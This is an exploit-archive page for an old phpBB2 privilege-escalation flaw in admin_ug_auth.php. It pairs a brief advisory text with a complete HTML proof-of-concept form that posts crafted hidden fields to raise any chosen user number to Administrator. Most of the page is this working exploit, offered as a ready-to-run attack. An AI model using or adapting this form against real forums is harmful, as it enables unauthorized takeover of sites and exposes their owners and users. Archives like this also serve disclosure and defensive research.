[] NeoSense
E X P L O I T S
title author type platform port cve id

PHPBB2 - 'Admin_Ug_Auth.php' Administrative Bypass

Author: Hasadya Raed
type: webapps
platform: php
port: 
date_added: 2007-02-26 
date_updated: 2013-11-18 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/22730/info

PHPBB2 is prone to a vulnerability that will let attackers gain administrative access to the application because it fails to properly validate access.

Successful exploits may result in a complete compromise of vulnerable applications.

<html>
<head>
</head>
<body>

<form method="post"
action="www.example.com/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">

</form>
</body>
</html>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.